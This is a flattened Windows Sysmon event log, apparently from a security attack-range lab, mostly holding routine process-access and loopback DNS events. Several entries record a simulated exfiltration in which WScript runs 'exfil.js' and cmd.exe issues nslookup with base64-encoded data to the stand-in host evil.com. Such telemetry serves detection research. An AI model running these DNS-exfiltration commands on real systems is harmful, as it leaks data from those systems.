14:16:40.507{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000203009Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:40.507{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000203008Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:40.507{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17C8-629A-7B41-000000005F02}1716C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000203007Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:40.507{2E1864BB-17C8-629A-7941-000000005F02}64487368C:\Windows\system32\cmd.exe{2E1864BB-17C8-629A-7B41-000000005F02}1716C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000203006Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:40.511{2E1864BB-17C8-629A-7B41-000000005F02}1716C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A QWNjVHlwZTogNTEy evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-17C8-629A-7941-000000005F02}6448C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A QWNjVHlwZTogNTEy evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlykdy.tmp 2>&1 10341000x8000000000000000203005Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:40.491{2E1864BB-E13E-6299-1000-000000005F02}3643436C:\Windows\system32\svchost.exe{2E1864BB-17C8-629A-7A41-000000005F02}7152C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000203004Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:40.491{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-17C8-629A-7A41-000000005F02}7152C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000203003Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:40.475{2E1864BB-17C8-629A-7A41-000000005F02}71527240C:\Windows\system32\conhost.exe{2E1864BB-17C8-629A-7941-000000005F02}6448C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000203002Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:40.475{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17C8-629A-7A41-000000005F02}7152C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 354300x8000000000000000203001Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:39.026{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52967- 354300x8000000000000000203000Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:39.026{00000000-0000-0000-0000-000000000000}5896<unknown process>-udptruefalse127.0.0.1-52967-false127.0.0.1-53domain 354300x8000000000000000202999Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:39.025{00000000-0000-0000-0000-000000000000}5896<unknown process>-udpfalsefalse127.0.0.1-52966-false127.0.0.1-53domain 354300x8000000000000000202998Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:39.025{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52966- 354300x8000000000000000202997Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:39.025{00000000-0000-0000-0000-000000000000}5896<unknown process>-udptruefalse127.0.0.1-52966-false127.0.0.1-53domain 354300x8000000000000000202996Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:39.024{00000000-0000-0000-0000-000000000000}5896<unknown process>-udpfalsefalse127.0.0.1-52965-false127.0.0.1-53domain 354300x8000000000000000202995Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:39.023{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52965- 10341000x8000000000000000202994Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:40.460{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 354300x8000000000000000202993Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:39.023{00000000-0000-0000-0000-000000000000}5896<unknown process>-udptruefalse127.0.0.1-52965-false127.0.0.1-53domain 354300x8000000000000000202992Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:38.860{00000000-0000-0000-0000-000000000000}6196<unknown process>-udpfalsefalse127.0.0.1-52964-false127.0.0.1-53domain 354300x8000000000000000202991Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:38.860{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52964- 354300x8000000000000000202990Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:38.860{00000000-0000-0000-0000-000000000000}6196<unknown process>-udptruefalse127.0.0.1-52964-false127.0.0.1-53domain 10341000x8000000000000000202989Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:40.460{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 354300x8000000000000000202988Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:38.859{00000000-0000-0000-0000-000000000000}6196<unknown process>-udpfalsefalse127.0.0.1-52963-false127.0.0.1-53domain 10341000x8000000000000000202987Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:40.460{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 354300x8000000000000000202986Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:38.859{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52963- 354300x8000000000000000202985Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:38.859{00000000-0000-0000-0000-000000000000}6196<unknown process>-udptruefalse127.0.0.1-52963-false127.0.0.1-53domain 10341000x8000000000000000202984Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:40.460{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000202983Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:40.460{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17C8-629A-7941-000000005F02}6448C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 354300x8000000000000000202982Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:38.856{00000000-0000-0000-0000-000000000000}6196<unknown process>-udpfalsefalse127.0.0.1-52962-false127.0.0.1-53domain 354300x8000000000000000202981Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:38.856{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52962- 354300x8000000000000000202980Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:38.856{00000000-0000-0000-0000-000000000000}6196<unknown process>-udptruefalse127.0.0.1-52962-false127.0.0.1-53domain 10341000x8000000000000000202979Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:40.460{2E1864BB-17A1-629A-783D-000000005F02}55525124C:\Windows\System32\WScript.exe{2E1864BB-17C8-629A-7941-000000005F02}6448C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 354300x8000000000000000202978Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:38.744{00000000-0000-0000-0000-000000000000}2800<unknown process>-udpfalsefalse127.0.0.1-52961-false127.0.0.1-53domain 154100x8000000000000000202977Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:40.471{2E1864BB-17C8-629A-7941-000000005F02}6448C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A QWNjVHlwZTogNTEy evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlykdy.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-17A1-629A-783D-000000005F02}5552C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 354300x8000000000000000202976Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:38.744{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52961- 354300x8000000000000000202975Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:38.744{00000000-0000-0000-0000-000000000000}2800<unknown process>-udptruefalse127.0.0.1-52961-false127.0.0.1-53domain 354300x8000000000000000202974Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:38.743{00000000-0000-0000-0000-000000000000}2800<unknown process>-udpfalsefalse127.0.0.1-52960-false127.0.0.1-53domain 354300x8000000000000000202973Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:38.743{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52960- 354300x8000000000000000202972Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:38.743{00000000-0000-0000-0000-000000000000}2800<unknown process>-udptruefalse127.0.0.1-52960-false127.0.0.1-53domain 354300x8000000000000000202971Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:38.743{00000000-0000-0000-0000-000000000000}2800<unknown process>-udpfalsefalse127.0.0.1-52959-false127.0.0.1-53domain 354300x8000000000000000202970Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:38.743{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52959- 354300x8000000000000000202969Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:38.743{00000000-0000-0000-0000-000000000000}2800<unknown process>-udptruefalse127.0.0.1-52959-false127.0.0.1-53domain 354300x8000000000000000202968Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:38.664{00000000-0000-0000-0000-000000000000}5724<unknown process>-udpfalsefalse127.0.0.1-52958-false127.0.0.1-53domain 354300x8000000000000000202967Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:38.664{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52958- 354300x8000000000000000202966Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:38.664{00000000-0000-0000-0000-000000000000}5724<unknown process>-udptruefalse127.0.0.1-52958-false127.0.0.1-53domain 354300x8000000000000000202965Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:38.664{00000000-0000-0000-0000-000000000000}5724<unknown process>-udpfalsefalse127.0.0.1-52957-false127.0.0.1-53domain 354300x8000000000000000202964Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:38.664{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52957- 354300x8000000000000000202963Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:38.663{00000000-0000-0000-0000-000000000000}5724<unknown process>-udptruefalse127.0.0.1-52957-false127.0.0.1-53domain 354300x8000000000000000202962Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:38.663{00000000-0000-0000-0000-000000000000}5724<unknown process>-udpfalsefalse127.0.0.1-52956-false127.0.0.1-53domain 354300x8000000000000000202961Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:38.201{00000000-0000-0000-0000-000000000000}8096<unknown process>-udpfalsefalse127.0.0.1-52945-false127.0.0.1-53domain 354300x8000000000000000202960Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:38.201{00000000-0000-0000-0000-000000000000}8096<unknown process>-udptruefalse127.0.0.1-52945-false127.0.0.1-53domain 354300x8000000000000000202959Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:38.200{00000000-0000-0000-0000-000000000000}8096<unknown process>-udptruefalse127.0.0.1-52943-false127.0.0.1-53domain 354300x8000000000000000202958Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:38.138{00000000-0000-0000-0000-000000000000}3292<unknown process>-udpfalsefalse127.0.0.1-52942-false127.0.0.1-53domain 354300x8000000000000000202957Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:38.138{00000000-0000-0000-0000-000000000000}3292<unknown process>-udptruefalse127.0.0.1-52942-false127.0.0.1-53domain 354300x8000000000000000202956Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:38.138{00000000-0000-0000-0000-000000000000}3292<unknown process>-udpfalsefalse127.0.0.1-52941-false127.0.0.1-53domain 23542300x8000000000000000202955Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:40.460{2E1864BB-17A1-629A-783D-000000005F02}5552ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlekku.tmpMD5=7D9173BD0DB6CB1EF243CECFF708168B,SHA256=E1F06C46829F00B73E93E5CA6A77E87CA3F897BE9C930070FC4C0794E517005D,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000202954Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:38.138{00000000-0000-0000-0000-000000000000}3292<unknown process>-udptruefalse127.0.0.1-52941-false127.0.0.1-53domain 354300x8000000000000000202953Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:38.138{00000000-0000-0000-0000-000000000000}3292<unknown process>-udpfalsefalse127.0.0.1-52940-false127.0.0.1-53domain 354300x8000000000000000202952Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:38.137{00000000-0000-0000-0000-000000000000}3292<unknown process>-udptruefalse127.0.0.1-52940-false127.0.0.1-53domain 354300x8000000000000000202951Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:37.989{00000000-0000-0000-0000-000000000000}7804<unknown process>-udptruefalse127.0.0.1-52934-false127.0.0.1-53domain 354300x8000000000000000202950Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:37.919{00000000-0000-0000-0000-000000000000}5704<unknown process>-udpfalsefalse127.0.0.1-52933-false127.0.0.1-53domain 354300x8000000000000000202949Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:37.919{00000000-0000-0000-0000-000000000000}5704<unknown process>-udptruefalse127.0.0.1-52933-false127.0.0.1-53domain 354300x8000000000000000202948Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:37.918{00000000-0000-0000-0000-000000000000}5704<unknown process>-udpfalsefalse127.0.0.1-52932-false127.0.0.1-53domain 354300x8000000000000000202947Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:37.918{00000000-0000-0000-0000-000000000000}5704<unknown process>-udptruefalse127.0.0.1-52932-false127.0.0.1-53domain 354300x8000000000000000202946Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:37.918{00000000-0000-0000-0000-000000000000}5704<unknown process>-udpfalsefalse127.0.0.1-52931-false127.0.0.1-53domain 354300x8000000000000000202945Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:37.918{00000000-0000-0000-0000-000000000000}5704<unknown process>-udptruefalse127.0.0.1-52931-false127.0.0.1-53domain 354300x8000000000000000202944Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:37.862{00000000-0000-0000-0000-000000000000}8016<unknown process>-udpfalsefalse127.0.0.1-52930-false127.0.0.1-53domain 354300x8000000000000000202943Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:37.862{00000000-0000-0000-0000-000000000000}8016<unknown process>-udptruefalse127.0.0.1-52930-false127.0.0.1-53domain 354300x8000000000000000202942Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:37.862{00000000-0000-0000-0000-000000000000}8016<unknown process>-udpfalsefalse127.0.0.1-52929-false127.0.0.1-53domain 354300x8000000000000000202941Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:37.862{00000000-0000-0000-0000-000000000000}8016<unknown process>-udptruefalse127.0.0.1-52929-false127.0.0.1-53domain 354300x8000000000000000202940Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:37.862{00000000-0000-0000-0000-000000000000}8016<unknown process>-udpfalsefalse127.0.0.1-52928-false127.0.0.1-53domain 